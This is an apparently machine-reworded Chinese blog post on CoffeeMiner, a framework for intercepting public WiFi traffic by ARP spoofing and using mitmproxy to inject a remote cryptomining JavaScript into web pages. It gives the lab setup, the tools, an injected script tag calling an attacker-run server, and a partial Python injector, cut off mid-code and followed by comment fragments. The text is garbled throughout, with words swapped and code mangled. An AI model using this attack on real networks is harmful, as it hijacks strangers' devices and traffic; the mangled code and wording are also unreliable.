CoffeeMiner:劫持WiFi网络接入设备进行“挖矿”的框架
"好多个礼拜之前,我见到了在网上有关网络黑客被劫持星巴克咖啡无线网互联网中的笔记本开展“挖币”的报导,十分有趣,融合剖析,我觉得,还可用委托人MITM检测方法来建立相近目地。文中中人们就来探讨,怎样以MITM方法在html语言网页页面中引入javascript,让这些连接公共性无线网络的电子产品变成网络黑客手上的“挖币”矿工。最后我能撰写1个实际上的被称作“CoffeeMiner”的脚本制作,能够用它来在奶茶店等公布无线网络网络空间中开展qq群匿名渗入,建立操控很多电子产品进行“挖币”目地。
检测情景
要在在1个公布的无线网络网络空间中建立该种目地,CoffeeMiner测试者要试着阻拦客户和无线路由中间的总流量,给出如图所示:
情景设定
真實情景中,无线网络互联网中连接了各种各样智能机或平板,为了更好地详细分析,人们构建了1个虚拟网络自然环境开展检测。再此会采用VirtualBox和安裝之中的Kali Linux,人们会安裝3个虚拟机Kali系统软件,分別饰演下列人物角色:
受害人:连接了无线网络无线路由并预览了一些故意网页页面
测试者:运作CoffeeMiner专用工具,进行MITM检测
路由器/网关ip机器设备:具有一般网关ip功效
如果进行检测,实际上情景应当是那样的,即受害人的数据流量要遭劫持:
人们分別对3台虚拟机开展下列配备:
受害人
网络适配器:
eth0: Host-GXG Adapter
/etc/network/interfaces:
测试者
网络适配器:
eth0: Host-GXG Adapter
/etc/network/interfaces:
路由器/网关ip机器设备
网络适配器:
eth0: Bridged Adapter
eth1: Host-GXG Adapter
/etc/network/interfaces:
撰写CoffeeMiner编码
ARP spoofing程序模块
这里,人们选用ARP spoofing来建立委托人MITM检测:
在计算机网中,ARP蒙骗、ARP缓存文件中毒了或ARP路由器毒化全是测试者在内网中上传仿冒ARP信息的技术性,通常情况下,其总体目标是将测试者的Mac详细地址与默认网关或其他服务器的ip地址关联,进而可将该ip地址有关的一切通信网络总流量发送到测试者电脑上,建立总流量阻拦和统计数据盗取主要故意目地。
以便建立该作用,人们要采用arpspoof和嗅探工具dsniff:
mitmproxy
mitmproxy是这款流量统计和编写专用工具,能够用它来进行委托人检测MITM。再此,人们能够用它来在html语言网页页面中引入javascript脚本制作,出自于实际操作简单,人们只向html语言网页页面中引入每行编码,以后该行编码就会远程控制启用实行相对的javascript挖币脚本制作。该行引入编码为:
<script src="".com://httpserverIP:9000/script.Js"">" data-word='script' class="" >script>
Injector
如果人们捕获了受害人的数据流量以后,就可之中引入人们结构的脚本制作,以便建立脚本制作引入,人们必须采用 mitmproxy API 来撰写相对injector编码:
from bs4 import BeautifulSoup from mitmproxy import ctx, .com import argparse class Injector: def __init__(self, path): self.path = path
def response(self, flow: .com.HTTPFlow) -> None: if self.path:
html语言 = BeautifulSoup(flow.response.content, ""html语言.parser"")
print(self.path)
print(flow.response.headers[""content-type""])
if flow.response.headers[""content-type""] == 'text/html语言':
script = html语言.new_tag(
""script"",
相关文章
- 2条评论
- 性许夙世2022-06-01 02:12:45
- ntent-type""] == 'text/html语言': script = ht
- 美咩厌味2022-06-01 00:37:08
- ; if self.path: html语言